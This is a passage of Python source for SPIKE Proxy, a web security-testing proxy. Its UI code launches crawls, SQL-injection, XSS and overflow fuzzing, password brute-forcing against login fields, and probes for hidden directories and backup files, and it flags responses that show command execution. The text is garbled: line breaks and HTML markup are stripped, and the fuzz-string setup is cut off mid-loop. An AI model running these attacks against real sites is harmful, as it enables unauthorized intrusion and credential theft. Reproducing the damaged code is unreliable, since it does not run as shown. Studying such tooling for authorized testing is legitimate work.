daveutil.dmkdir(daveutil.pathjoin(self.basedir,self.sitestr(site))) return 1 #returns the entire directory structure for a given page def pagestrh(self,clientheader): #not too complex return daveutil.pathjoin(self.sitrstrh(clientheader),self.getPageH(clientheader)) #rips off the arguments and stuff to yield a nice /bob/dave.php #takes in a clientheader, not a string! #TODO: this fails currently for urls with a asdf.ng/bob=asdf&asdf=asdf #syntax def getPageH(self,clientheader): #we already have this stored in the client header #print "getPageH "+str(clientheader)+" Type: "+str(type(clientheader)) site=self.sitestrh(clientheader) url=daveutil.urlnormalize(clientheader.URL) #dunno why this happens, but it does - techinsurance.com does it if url[-1]=="/": return daveutil.pathjoin(site,url,"_directory_") else: return daveutil.pathjoin(site,url) #strip off the following dave.php and leave /bob/ def getDir(self,page): return "/"+os.path.dirname(page) #returns boolean value for whether we've seen this page before def havePageInStore(self,page): dir=self.getDir(page) wholepath, filename = os.path.split(page) return os.path.isdir(daveutil.pathjoin(self.basedir,dir,filename)) #creates a directory for our page. It looks like this: ./sitebase/bob/dave.php/ def createPage(self,page): #used to do some crazy stuff here, but it's really quite simple #print "page="+page #print "basedir="+self.basedir dirtomake=daveutil.pathjoin(self.basedir,page) #print "Trying to make dir "+dirtomake daveutil.dmkdir(dirtomake) return 1 #returns 1 if it's a request and response we've seen before, otherwise 0 def duplicateRequestandResponse(self,clientheader,clientbody,serverheader,serverbody): #print "inside duplicateRequestandResponse" #first get a list of the files in page's directory. the directory #is guaranteed to exist pagedir=daveutil.pathjoin(self.basedir,self.getPageH(clientheader)) filelist=dircache.listdir(pagedir) #print "pagedir="+pagedir #print "filelist="+str(filelist) #order N operation here...we iterate over data newhash=daveutil.genhash(clientheader,clientbody,serverheader,serverbody) #print "Done with hashing in duplicateRequestandReponse" #we just compare hashes now for afile in filelist: #ignore directories if os.path.isdir(afile): continue oldhash=afile.split("_")[0] if oldhash==newhash: return 1 #print "Unique object: leaving duplicateRequestandResponse" return 0 def strencode(self,astring): return daveutil.strencode(astring) #stores a request and response into our file structure for later retrival def storeRequestandResponse(self, clientheader,clientbody,serverheader,serverbody): #print "instore "+str(clientheader)+" Type: "+str(type(clientheader)) dir=daveutil.pathjoin(self.basedir,self.getPageH(clientheader)) #print "Dir: "+dir hash=daveutil.genhash(clientheader,clientbody,serverheader,serverbody) #we encode the directory name (the full page) for easy uniqueness test filename=daveutil.pathjoin(dir,hash+"_"+self.strencode(clientheader.connectHost)) #here we check for any ODBC strings or whatnot, and if we don't #see one of those, and we are in the "don't store" list, we just #return triginfo=self.scanForTriggers(serverheader,serverbody) if triginfo=="" and clientheader in self.nottolog: return 1 #print out the warning if triginfo!="": self.log("Warning: "+filename+" triggered "+triginfo) #print "Storing request in filename: "+filename obj=RequestAndResponse(clientheader,clientbody,serverheader,serverbody) #print "obj: "+str(obj) #obj.printme() openfile=open(filename,"wb") #print "openfile="+str(openfile)+" object: "+str(obj) binary=1 cPickle.dump(obj,openfile,binary) openfile.close() #print "Done storing request in filename: "+filename #print "Now saving in requestCache" #ok, now we need to store it in our bucket of things we've just done for the request cache if clientheader.URL[-4:].lower() not in [".gif",".jpg",".png"]: #let's not save pictures in the request cache self.saveInRequestCache(filename) return 1 #serve a file, replacing keywords with something appropriate #used for static html files. not spike cgi requests def serveFile(self,filename): debug_serveFile=0 if debug_serveFile: print "serving file "+filename #strip this last bit off mybase=daveutil.pathjoin(self.basedir,"..") realfilename=daveutil.pathjoin(mybase,filename) if os.path.isfile(realfilename): file=open(realfilename,"r") data=file.read() file.close() else: data="Error in Spike Proxy UI - No file found: "+realfilename for word in self.keywords.keys(): if data.count(word) != 0: data=data.replace(word,self.runkeyword(word)) header="" #adds both the header and the data header+=self.addHeader(data) if debug_serveFile: print "done serving file "+filename response=header return response #init function to set up our function list for keywords in our responses def initkeywords(self): self.keywords={} self.keywords["***SITES***"]=self.getSites self.keywords["***requestcache***"]=self.printRequestCache self.keywords["***LOGS***"]=self.printLogs return #called whenever we find a keyword in our response - used to replace #things in html files we respond with #returns an html string def runkeyword(self,word): #print "Running keyword: "+word if not self.keywords.has_key(word): return "Some sort of keyword error: keyword "+word+" not found." return self.keywords[word]() #returns an html string of all the sites we have seen def getSites(self): sitedir=daveutil.pathjoin(self.basedir) return self.htmlDirectory(sitedir) def printRequestCache(self): result="
    " for file in self.requestCache: display=file.split("/")[-1] link=file.replace(self.basedir,"") start="Request: " result+="
  • "+ start + display + "
    " + self.getOptions(file,1)+"
    • " return result def printLogs(self): result="" for log in self.logs: result+="Log: "+log+"
    " return result #takes in a directory name and returns an html string representing all the fun you can #have with it! def htmlDirectory(self,dir): result="
      " #print "htmlDirectory on "+dir filelist=os.listdir(dir) #print "str(filelist)="+str(filelist) for site in filelist: if not os.path.isdir(daveutil.pathjoin(dir,site)): isrequest=1 start="Request: " else: isrequest=0 start="Directory: " #print "Options: %s"%daveutil.pathjoin(dir,site) result+="
    • "+ start + site + "
      " + self.getOptions(daveutil.pathjoin(dir,site),isrequest)+"
      • " result+="
    " return result #returns and html string for the options the user can click on to do #things like "crawl" "resend with modifications" etc #must change site around for rewrite request def getOptions(self,dir,isrequest): realdir=dir.replace(self.basedir,"") #print "getOptions realdir="+realdir site=daveutil.pathsplit(realdir)[0] #print "Site=%s"%site try: sitename=site.split("_")[0] siteport=site.split("_")[1] sitessl=site.split("_")[2]=="1" except: #something bad happened #XXX - Must fix this bug return "Error" if sitessl: site="https://"+sitename else: site="http://"+sitename #site always uses / because it is a URL now site+=":"+siteport+"/" site+="/".join(daveutil.pathsplit(realdir)[1:-1]) site=site.replace("/_directory_","") if isrequest==1: getinfo="Print Request Info" else: getinfo="Delve into Dir" #print "getOptions site: "+site result= " "+getinfo+", " if isrequest: result+=" rewrite request, " result+=" Display Response, " if isrequest: result+=" crawl, " result+=" argscan, " result+=" dirscan, " result+=" overflow " result+=" VulnXML Tests " return result #rewrite a request and resend it def rewrite(self,file): #print "inside rewrite" realfile=daveutil.pathjoin(self.basedir,file) if os.path.isfile(realfile): result= self.displayRequestForm(realfile) return result print "Could not rewrite file: "+realfile return notimplementedyet def crawl(self,file): #set this to 1 to enable debug printfs debug_crawl=0 #ok, I have a file I want to crawl #I need to open this file, get the IP and virtualhost we are #crawling and the start URL and any cookies and whatnot crawlURLList=[] doneURLList=[] realfile=daveutil.pathjoin(self.basedir,file) if not os.path.isfile(realfile): self.log( "!!!Some sort of error trying to crawl "+file) return notimplementedyet infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() response=obj.getResponse() myhdr=obj.clientheader mybdy=obj.clientbody startURLs=[myhdr.URL] if startURLs==[]: self.log( "No URLS found to crawl from "+file) for o in startURLs: crawlURLList.append(o) #site is now https://www.cnn.com/ or similar site=myhdr.getSite() self.log("Starting crawl on site %s with URLs %s" % (site,str(startURLs))) #we're not done yet. :> done=0 while not done: if self.stopallactions==1: return "stopped" #cding into this url freezes my shell. Let's not use it #Why does python treat it as ..? Must #be some bug in my code buglist=["/=\\"] #we set this and unset it if we find any we need to do done=1 for url in crawlURLList: if debug_crawl: print "crawl: URLList: %s" % url if url in buglist: continue if url not in doneURLList: doneURLList.append(url) if debug_crawl: print "Setting done to 0" done=0 myhdr.URL=url #if you don't remove these, then you sometimes get 304s which are not useful for crawling myhdr.removeHeaders("If-Modified-Since") myhdr.removeHeaders("If-None-Match") self.log("Crawling URL: "+url) #we store every request as we crawl it newpage=self.makeRequest(myhdr,mybdy) newURLS=daveutil.collectURLSFromPage(newpage) if debug_crawl: self.log("Collected %d URLS from Page of length %d" % (len(newURLS),len(newpage))) #print "New URLS are: "+str(newURLS) for newurl in newURLS: if debug_crawl: print "crawl: newurl=%s" % newurl if newurl[:4] != "http" and newurl.find("://")==-1: if self.stopallactions==1: return "stopped" if debug_crawl: print "Found non-absolute URL %s" % newurl newurl=urlparse.urljoin(url,newurl) if debug_crawl: print "Doing: "+newurl #get extention and make sure we want to parse it if newurl.split(".")[-1] in invalidHTMLExtentions: self.log("Skipping non HTML page: "+newurl) #continue with for loop continue if debug_crawl: print "newurl header: _%s_" % newurl[:7] if newurl[:7] == "http://" or newurl[:8]=="https://": if debug_crawl: print "crawl: Absolute URL found " + newurl #this doesn't have a trailing / newsite="/".join(newurl.split("/")[:3]) #rip the site off of the newurl newerurl="/".join(newurl.split("/")[3:]) #why would this happen? Well, we're covered if it does. if newerurl=="": newerurl="/" if newerurl[0]!="/": newerurl="/"+newerurl if newurl[-1]=="/" and newerurl[-1]!="/": newerurl+="/" if newurl[-1]!="/" and newerurl[-1]=="/": newerurl=newerurl[:-1] newurl=newerurl if newsite != site: if debug_crawl: self.log("crawl: Ignoring url on non-crawled site:"+newsite) else: if newurl not in doneURLList: if debug_crawl: print "New URL Found: "+newurl crawlURLList.append(newurl) else: #not an absolute URL if newurl[:7]=="mailto:": if debug_crawl: self.log( "Ignoring mailto URL:"+newurl) continue if debug_crawl: print "non-absolute URL found:"+newurl newurl=urlparse.urljoin(url,newurl) if newurl[0]!="/": newurl="/"+newurl if newurl not in doneURLList: if debug_crawl: print "crawl: New URL Found: "+newurl crawlURLList.append(newurl) self.log("Done with crawl!") header="" footer="" middle="Crawled Urls:

    " for url in doneURLList: middle+="

  • "+url+"
    • " return header+middle+footer #gives the client the response. def displayResponse(self,file): result="" realfile=daveutil.pathjoin(self.basedir,file) #unpickle infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() #load response result+=obj.getResponse() #send it out return result def getinfo(self,file): realfile=daveutil.pathjoin(self.basedir,file) #print "getinfo on realfile: "+realfile if os.path.isdir(realfile): #print "Was a directory." return self.htmlDirectory(realfile) else: #it's a file so we need to display it in text return self.printRequestFile(realfile) def printRequestFile(self,realfile): try: infile=open(realfile,"rb") except: return "Error opening that file." obj=cPickle.load(infile) infile.close() data=obj.printme() return data #TODO: Move this stuff into separate files with readline #so you can just vi a new string into existance def setupfuzzstrings(self): self.odbcscanfuzzstrings=[] self.overflowfuzzstrings=[] fuzzcharacters=["A","1","\"",".","<","%","%n"] maxchars=5000 for fchar in fuzzcharacters: i=1 while ialert('XSS')") #look for /backup/ /admin/ etc def dirscan(self,file): self.log("Starting directory scan on "+file) self.scannedForDirs={} self.scannedForFiles={} result= self.dofilescan(file) self.log("Done with directory scan on "+file) return result #scans a single field for a password def passwordargscan(self,file,name,failed=[],succeeded=succeededList,wordlist=PassCheckList): self.log("Password Scan Started on %s name %s" % (file,name) ) foundnameinheader=0 foundnameinbody=0 if failed==[]: failed=passwordFailedList #read in file and unpickle it into a request object realfile=daveutil.pathjoin(self.basedir,file) infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() #save these off in shorter form ch=obj.clientheader cb=obj.clientbody #split the body data for processing oldbodydata=cb.data[:] orderlist=[] bodyargs=daveutil.splitargs("".join(cb.data),orderlist=orderlist) if ch.URLargsDict.has_key(name): foundnameinheader=1 oldheader=ch.URLargsDict[name][:] if bodyargs.has_key(name): foundnameinbody=1 if not foundnameinheader and not foundnameinbody: return "Sorry, did not find that name %s in the arguments!" % name if foundnameinheader and foundnameinbody: return "Sorry, found %s in BOTH header and body! Can't fuzz that." % name #so now we know we got one or the other foundone=0 oldvalue=bodyargs[name][:] for passwordguess in wordlist: if self.stopallactions: return "Stopped." if foundnameinheader: ch.URLargsDict[name]=urllib.quote_plus(passwordguess) else: bodyargs[name]=urllib.quote_plus(passwordguess) cb.data=daveutil.joinargs(bodyargs,orderlist=orderlist) self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #fail controls whether we log fail=0 if succeeded==[]: for key in failed: if result.find(key)!=-1: fail=1 else: fail=1 for key in succeeded: if result.find(key)!=-1: fail=0 break if fail==0: self.log("Found password %s" % passwordguess) self.registerRequestandResponse(ch,cb,None,None) foundone=1 break if foundnameinheader: ch.URLargsDict[name]=oldheader[:] else: bodyargs[name]=oldvalue[:] cb.data=oldbodydata[:] if foundone: return "Done Scanning for password: found=%s" % passwordguess else: return "Done scanning for password but found no passwords" #Scans a single argument for bad parms injection def sqlargscan(self,file,name,failed=[],succeeded=[]): if succeeded==[]: succeeded=sqlinjectSucceeded self.log("Argument Scan Started on %s name %s" % (file,name) ) foundnameinheader=0 foundnameinbody=0 if failed==[]: failed=[] #read in file and unpickle it into a request object realfile=daveutil.pathjoin(self.basedir,file) infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() #save these off in shorter form ch=obj.clientheader cb=obj.clientbody #split the body data for processing oldbodydata=cb.data[:] orderlist=[] bodyargs=daveutil.splitargs("".join(cb.data),orderlist) if ch.URLargsDict.has_key(name): foundnameinheader=1 if bodyargs.has_key(name): foundnameinbody=1 if not foundnameinheader and not foundnameinbody: return "Sorry, did not find that name %s in the arguments!" % name if foundnameinheader and foundnameinbody: return "Sorry, found %s in BOTH header and body! Can't fuzz that." % name #so now we know we got one or the other if foundnameinheader: oldvalue=ch.URLargsDict[name][:] else: oldvalue=bodyargs[name][:] foundone=0 for guess in self.odbcscanfuzzstrings: if self.stopallactions: return "Stopped." #DEBUG #print "Testing guess %s"%guess if foundnameinheader: ch.URLargsDict[name]=urllib.quote_plus(guess) else: bodyargs[name]=urllib.quote_plus(guess) cb.data=daveutil.joinargs(bodyargs,orderlist=orderlist) self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #fail controls whether we log fail=0 if succeeded==[]: for key in failed: if result.find(key)!=-1: fail=1 else: fail=1 for key in succeeded: if result.find(key)!=-1: fail=0 if fail==0: self.log("Found Injection Vulnerability with %s" % guess) self.registerRequestandResponse(ch,cb,None,None) foundone=1 break if foundnameinheader: ch.URLargsDict[name]=oldvalue[:] else: bodyargs[name]=oldvalue[:] cb.data=oldbodydata[:] return "Done scanning for injection click refresh and view log." def argscan(self,file): self.log("Starting argument fuzz on "+file) return self.doargsfuzz(file,self.odbcscanfuzzstrings) def overflow(self,file): self.log("Starting overflow fuzz on "+file) return self.doargsfuzz(file,self.overflowfuzzstrings) def lookforfiles(self,ch,cb): #copy this off oldheaderurl=ch.URL[:] if self.scannedForFiles.has_key(oldheaderurl): return "Already scanned directory "+oldheaderurl else: #save us off so we don't scan us again self.scannedForFiles[oldheaderurl]="" for suffix in backupSuffixList: newurl=oldheaderurl+suffix ch.URL=newurl self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #if we didn't see a "did not exist," then we found gold! if (result.count("404")==0 or result.count("403.6")!=0) and result.count("No such list ")==0 and result.count("405")==0: self.log("Found file! *"+newurl+"*") self.registerRequestandResponse(ch,cb,None,None) return "Done with scanning a file!" #ch is header of request we are going to scan for directories #such as /admin/ etc #also looks for file turds such as ws_ftp.log def lookfordirs(self,ch,cb): #copy this off oldheaderurl=ch.URL[:] if self.scannedForDirs.has_key(oldheaderurl): return "Already scanned directory "+oldheaderurl else: #save us off so we don't scan us again self.scannedForDirs[oldheaderurl]="" #self.log("Looking for dirs in "+oldheaderurl) for dir in scanDirList: newurl=oldheaderurl+dir+"/" ch.URL=newurl self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #No such list is the error message mailman gives...this reduces false positives if (result.count("404")==0 or result.count("403.6")!=0) and result.count("No such list ")==0 and result.count("405")==0: self.log("Found directory! *"+newurl+"*") self.registerRequestandResponse(ch,cb,None,None) if self.stopallactions: return "Stopped." for file in fileRotList: newurl=oldheaderurl+file ch.URL=newurl self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) if (result.count("404")==0 or result.count("403.6")!=0) and result.count("No such list ")==0 and result.count("405")==0: self.log("Found file! *"+newurl+"*") self.registerRequestandResponse(ch,cb,None,None) if self.stopallactions: return "Stopped." return "Done with scanning a directory!" def dofilescan(self,file): if self.stopallactions: return "Stopped." #read in file and unpickle it into a request object realfile=daveutil.pathjoin(self.basedir,file) #here we delve into directories transparently! if os.path.isdir(realfile): #self.log("Is a directory:"+realfile) filelist=os.listdir(realfile) for newfile in filelist: realnewfile=daveutil.pathjoin(file,newfile) #self.log("Delving file scan into: "+realnewfile) self.dofilescan(realnewfile) return "Done scanning for files and directories!" infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() #save these off in shorter form ch=obj.clientheader cb=obj.clientbody if realfile.count("_directory_")>0: self.lookfordirs(ch,cb) else: self.lookforfiles(ch,cb) #rip off the filename #self.log("New Dir from: "+ch.URL) base="/" dirs="/".join(ch.URL.split("/")[1:-1]) if dirs: base += dirs + "/" #self.log("Base="+base) ch.URL=base self.lookfordirs(ch,cb) return "Completed scanning for files and directories." #changes each value in the file's request to a fuzzstring #and sends the requests def doargsfuzz(self,file,fuzzstringsset,succeeded=sqlinjectSucceeded): #read in file and unpickle it into a request object realfile=daveutil.pathjoin(self.basedir,file) if self.stopallactions: return "Stopped." #here we handle directories transparently! if os.path.isdir(realfile): filelist=os.listdir(realfile) for newfile in filelist: realnewfile=daveutil.pathjoin(file,newfile) self.log("Delving test into: "+realnewfile) self.doargsfuzz(realnewfile,fuzzstringsset) return "Done with fuzzing a directory!" try: infile=open(realfile,"rb") obj=cPickle.load(infile) infile.close() except: return "Error reading file - most likely did not exist." #save these off in shorter form ch=obj.clientheader cb=obj.clientbody #for each argument # for each fuzzstring # replace argument with fuzzstring and try attack # when the attack is read into the Request storer, it'll # get scanned for successful ODBC messages and stuff if self.stopallactions: return "Stopped." #URL Arguments (GET requests) for variable in ch.URLargsDict.keys(): self.log(variable) oldvalue=ch.URLargsDict[variable][:] for fuzzstring in fuzzstringsset: #print "Using fuzzstring %s"%fuzzstring if self.stopallactions: return "Stopped." ch.URLargsDict[variable]=urllib.quote_plus(fuzzstring) #we basically ignore result! self.dontLog(ch) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #fail controls whether we log fail=1 for key in succeeded: fail=1 if result.find(key)!=-1: fail=0 if fail==0: self.log("Possible injection vuln with %s via %s" % (fuzzstring,key)) self.registerRequestandResponse(ch,cb,None,None) ch.URLargsDict[variable]=oldvalue[:] #BODY arguments (POSTS) #copy off old body data #copy this off oldbodydata=cb.data[:] orderlist=[] bodyargs=daveutil.splitargs("".join(cb.data),orderlist=orderlist) if bodyargs!=None: j=0 keylist=bodyargs.keys() for akey in keylist: oldvalue=bodyargs[akey] self.log("Fuzzing Body Argument: %s %d out of %d"%(akey,j,len(keylist))) j+=1 i=0 for fuzzstring in fuzzstringsset: print "Fuzzing Body Argument: %s %d out of %d"%(akey,j,len(keylist)) print "Using fuzzstring %d out of %d"%(i,len(fuzzstringsset)) i+=1 #if i<359: # continue if self.stopallactions: return "Stopped." #just use the fuzzstring bodyargs[akey]=urllib.quote_plus(fuzzstring) self.dontLog(ch) cb.data=daveutil.joinargs(bodyargs,orderlist=orderlist) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #fail controls whether we log fail=1 for key in succeeded: fail=1 if result.find(key)!=-1: fail=0 if fail==0: self.log("Possible injection vuln with %s" % fuzzstring) #now add the long string to the oldvalue. #works on MS Content Management Server! bodyargs[akey]=oldvalue+urllib.quote_plus(fuzzstring) self.dontLog(ch) cb.data=daveutil.joinargs(bodyargs,orderlist=orderlist) result=self.makeRequest(ch,cb) self.removeDontLog(ch) #fail controls whether we log fail=1 for key in succeeded: fail=1 if result.find(key)!=-1: fail=0 if fail==0: self.log("Possible injection vuln with %s via %s" % (fuzzstring,key)) bodyargs[akey]=oldvalue cb.data=oldbodydata[:] return "Done with fuzzing a file click refresh to review log!" #prints out a configuration form def printConfig(self): result="" result+="

    SPIKE Configuration Table

    \n" result+="

    General Options

    \n" result+="
    Load Dictionary from File \n" result+="" result+="" result+="

    \n" result+="
    Add Word To Dictionary \n" result+="" result+="" result+="

    \n" result+="
    Remove Word From Dictionary \n " result+="" result+="" result+="

    \n" result+="" result+="

    Password and SQL Argument Scanning Options

    \n" result+="Current Success List: "+str(succeededList)+"
    " result+="Current Failure List: "+str(passwordFailedList)+"

    " result+="

    Add Phrase To Success List \n " result+="" result+="" result+="

    \n" result+="
    Remove Phrase From Success List " result+="" result+="" result+="

    \n" result+="
    Add Phrase To Failure List " result+="" result+="" result+="

    \n" result+="
    Remove Phrase From Failure List " result+="" result+="" result+="

    \n" result+="

    False 404 Detection Options

    \n" result+="Current List of Strings: "+str(self.parent.get404List())+"
    \n" result+="
    Add phrase to list \n" result+="\n" result+="" result+="

    \n" result+="
    Remove phrase from list \n" result+="\n" result+="" result+="

    \n" result+="\n" return result def setConfig(self,name,value): if name=="AddToDict": scanDirList.append(value) elif name=="AddTo404List": self.parent.addTo404List(value) elif name=="RemoveFrom404List": self.parent.removeFrom404List(value) elif name=="AddToSuccess": succeededList.append(value) elif name=="removeFromDict": scanDirList.remove(value) elif name=="removeFromSuccess": succeededList.remove(value) elif name=="addToFailure": passwordFailedList.append(value) elif name=="removeFromFailure": passwordFailedList.remove(value) elif name=="loadDictFromFile": if value.count("/")>0 or value.count(".")>0: return "Cannot add a different directory's files" try: f=open(value,"r") except: return "Could not find file %s" % (value) contents=f.readlines() f.close() scanDirList = [chomp(line) for line in contents] return "Loaded wordlist from \""+value+"\"" return "Done." ################ def dontLog(self,ch): self.nottolog+=[ch] #print "self.nottolog="+str(self.nottolog) def removeDontLog(self,ch): self.nottolog.remove(ch) #loads a Request and displays it as a form def displayRequestForm(self,file): infile=open(file,"rb") obj=cPickle.load(infile) infile.close() ch=obj.clientheader cb=obj.clientbody requestfile=file.replace(self.basedir,"") #must use the real URL so that loading href "/bob.something" works as if from that server our_url=ch.URL+"_sendrequest" #strip off leading double slashes if our_url[:2]=="//": our_url=our_url[1:] site="http" if ch.clientisSSL: site+="s" site+="://"+ch.connectHost+":"+str(ch.connectPort) result="" result+="
    \n" result+=daveutil.printHiddenEntry("SPIKE_TRIGGER","yes") result+=daveutil.printFormEntry("Verb", ch.verb) result+=daveutil.printFormEntry("ConnectHost",ch.connectHost) result+=daveutil.printFormEntry("ConnectPort",str(ch.connectPort)) result+=daveutil.printFormEntry("URL",ch.URL) result+=daveutil.printFormCheckbox("SSL",ch.clientisSSL) result +="

    Headers

    " #print out all the headers i=0 for hkey in ch.headerValuesDict.keys(): for val in ch.headerValuesDict[hkey]: result+=daveutil.printFormEntryAndValue("Header"+str(i),hkey,val) i=i+1 #some extra headers if the user wants for i in range(i,i+5,1): result+=daveutil.printFormEntryAndValue("Header"+str(i),"","") result +="

    URL Args

    " i=0 if len(obj.clientheader.URLargsDict) > 0: for akey in ch.URLargsDict.keys(): result+=daveutil.printFormEntryAndValue("URLArg"+str(i),akey,ch.URLargsDict[akey],requestfile) i=i+1 #some extra URL arguments if the user wants for i in range(i,i+5,1): result+=daveutil.printFormEntryAndValue("URLArg"+str(i),"","") #now the body arguments i=0 result+="

    Body Args

    " if len(cb.data)>0: bodyargs=daveutil.splitargs("".join(obj.clientbody.data)) if bodyargs!=None: for akey in bodyargs.keys(): result+=daveutil.printFormEntryAndValue("BodyArg"+str(i),akey,bodyargs[akey],requestfile) i=i+1 #some extra body arguments if the user wants for i in range(i,i+5,1): result+=daveutil.printFormEntryAndValue("BodyArg"+str(i),"","") result+="" result+="" result+="
    " return result #just a little default header thing def addHeader(self,data): result="HTTP/1.1 200 OK\r\n" result+="Server: SPIKE Proxy 1.1\r\n" result+="Content-Type: text/html\r\n" result+="Content-Length: "+str(len(data))+"\r\n" result+="\r\n" result+=data return result #supports rewrite! #sends the actual request to the remote server! def sendrequest(self,myheader,mybody): result="" #new header and body to fill up newh=spkproxy.header() newb=spkproxy.body() #now disassemble myheader #debug #keys=myheader.URLargsDict.keys() #print "Keys: "+str(keys) bodyDict=mybody.getArgsDict() #print "BodyDict=%s"%str(bodyDict) newh.URL=urllib.unquote_plus(bodyDict["URL"]) #print "newh.URL="+newh.URL newh.verb=urllib.unquote_plus(bodyDict["Verb"]) newh.connectHost=urllib.unquote_plus(bodyDict["ConnectHost"]) newh.connectPort=urllib.unquote_plus(bodyDict["ConnectPort"]) newh.version="HTTP/1.1" #checkbox, only exists if it is checked newh.clientisSSL= bodyDict.has_key("SSL") #handle each other did=["SPIKE_TRIGGER","URL","Verb","ConnectHost","ConnectPort","SSL"] firstbodyarg=1 for akey in bodyDict.keys(): #filter the ones we already did if akey in did: continue #is it a header value? if akey.count("Header"): #names if akey[-1]=="N": valuename=akey[:-1]+"V" headername=akey else: valuename=akey headername=akey[:-1]+"N" header=bodyDict[headername] value=bodyDict[valuename] #add this to the did list so we don't do it again did.append(valuename) did.append(headername) if header!="": if not newh.headerValuesDict.has_key(header): newh.headerValuesDict[header]=[] newh.headerValuesDict[header].append(urllib.unquote_plus(value)) if akey.count("URLArg"): #names if akey[-1]=="N": valuename=akey[:-1]+"V" argname=akey else: valuename=akey argname=akey[:-1]+"N" arg=urllib.quote_plus(bodyDict[argname]) value=bodyDict[valuename] #add this to the did list so we don't do it again did.append(valuename) did.append(argname) #store it if arg!="": newh.URLargsDict[arg]=urllib.unquote_plus(value) if akey.count("Body"): #names if akey[-1]=="N": valuename=akey[:-1]+"V" argname=akey else: valuename=akey argname=akey[:-1]+"N" arg=urllib.quote_plus(bodyDict[argname]) value=bodyDict[valuename] #add this to the did list so we don't do it again did.append(valuename) did.append(argname) #storeit #print "arg=%s argname=%s valuename=%s"%(arg,argname,valuename) #print "Args:%s"%str(myheader.URLargsDict) if arg!="": if not firstbodyarg: newb.data.append("&") #we must put characters into the body, not strings newstring=urllib.unquote_plus(arg)+"="+urllib.unquote_plus(value) for ch in newstring: newb.data.append(ch) firstbodyarg=0 #ok, so now we have a new header and body (newh, newb) #print "newbody=%s"%str(newb.data) result=self.makeRequest(newh,newb) return result def saveInRequestCache(self,filename): self.requestCache=[filename]+self.requestCache #cut the last entry off if we're getting too big if len(self.requestCache)==self.requestCacheMaxLength: del self.requestCache[-1] def log(self,loginfo): timeoflog=time.asctime() logstring= "[%s] : %s" % (timeoflog,loginfo) #print it out to our running string print logstring self.logs=[logstring]+self.logs if len(self.logs)==self.maxlogs: del self.logs[-1] #makes a request - doesn't fork off a new thread #takes in a header and body #does handle SSL #returns a header and body from the server as a string def makeRequest(self,newh,newb): #we send ourselves in as the UI for our child request myconnection=spkproxy.spkProxyConnection(None,self,proxy=self.proxy,ntlm=self.ntlm) myconnection.clientisSSL=newh.clientisSSL if newh.clientisSSL: myconnection.sslHost=newh.connectHost myconnection.sslPort=newh.connectPort result=myconnection.sendRequest(newh,newb) return result #sets up the triggers for errors messages we detect def setupTriggers(self): self.scantriggers=[] self.scantriggers.append(("ODBC","ODBC Error!")) self.scantriggers.append(("Internal Server","Internal Server Error!")) self.scantriggers.append(("SQLException","SQL Injection flaw on DB2!")) self.scantriggers.append(("SQLSTATE","SQL Injection flaw on DB2!")) self.scantriggers.append(("Volume in drive","dir.exe was spawned!")) self.scantriggers.append(("Microsoft Windows 2000 [Version","cmd.exe was spawned!")) self.scantriggers.append(("Internal Server Error","Internal Server Error was detected!")) #returns a 1 if triggered on something #BUGS: we only return one trigger at a time def scanForTriggers(self,serverheader,serverbody): retval="" allbody="".join(serverbody.data) for triggerstring,triggervalue in self.scantriggers: if allbody.count(triggerstring): retval=triggerstring return retval ###XML TESTS def doXMLTest(self,file): #init code self.XMLDirectoriesScanned=[] self.XMLFilesScanned=[] self.XMLSitesScanned=[] self.xmlTest(file) #fin code self.log("Completely done with VulnXML Test on %s!"%file) return "Done with VulnXML Tests on %s" % (file) def xmlTest(self,file): #if the file is a directory or site, recurse into it #if the site-only has been clicked, only run site tests realfile=daveutil.pathjoin(self.basedir,file) #we have to use the directory to get the SITE because #we do not necessarally have an actual request file #get the first directory after the basedir site=daveutil.pathsplit(realfile.replace(self.basedir,""))[0] #split it up siteList=site.split("_") #get the site info sitename=siteList[0] siteport=siteList[1] siteSSL=int(siteList[2]) self.runXMLSiteTests(sitename,siteport,siteSSL) #here we handle directories transparently! if os.path.isdir(realfile): filelist=os.listdir(realfile) for newfile in filelist: realnewfile=daveutil.pathjoin(file,newfile) self.log("Delving XML test into: "+realnewfile) #self.log("XML SITES SCANNED %s"%str(self.XMLSitesScanned)) self.xmlTest(realnewfile) return "Done with xmlTesting the %s directory!"%file #we are a file - meaning we are an actual request self.runXMLFileandVariableTests(file) self.log("Finished xmlTest on %s"%file) return "Done with xmlTest" def runXMLSiteTests(self,sitename,siteport,siteSSL): if "_".join([sitename,str(siteport),str(siteSSL)]) in self.XMLSitesScanned: #self.log("MATCHED") return self.log("Doing XML Site Tests on %s %s %d"%(sitename,siteport,siteSSL)) time.sleep(15) #self.log("XML SITES SCANNED %s"%str(self.XMLSitesScanned)) self.XMLSitesScanned.append("_".join([sitename,str(siteport),str(siteSSL)])) #self.XMLSitesScanned.append("ASDF") siteTestsDir=os.path.join(os.path.join(os.getcwd(),self.VulnXMLDirectory),self.VulnXMLSiteTestDirectory) allSiteTests=os.listdir(siteTestsDir) for sitetest in allSiteTests: if sitetest[-4:]!=".xml": continue if self.stopallactions==1: return "stopped" #load the site test siteTest=VulnXML.VulnXMLTest(file=daveutil.pathjoin(siteTestsDir,sitetest)) siteTest.setUI(self) #run the site test against our site results=siteTest.SiteRun((sitename,siteport,siteSSL)) #report the results for message in results.logMessages: self.log("%s"%message) return def runXMLDirectoryTests(self,directory,infile): #check if we've done this one if directory in self.XMLDirectoriesScanned: return self.log("runXMLDirectoryTests on %s"%directory) self.XMLDirectoriesScanned.append(directory) dirTestsDir=os.path.join(os.path.join(os.getcwd(),self.VulnXMLDirectory),self.VulnXMLDirectoryTestsDirectory) allDirTests=os.listdir(dirTestsDir) for dirtest in allDirTests: if dirtest[-4:]!=".xml": continue if self.stopallactions==1: return "stopped" #load the site test dirTest=VulnXML.VulnXMLTest(file=daveutil.pathjoin(dirTestsDir,dirtest)) dirTest.setUI(self) #run the directory test against our site #using infile as the template request #print "Directory = %s"%directory 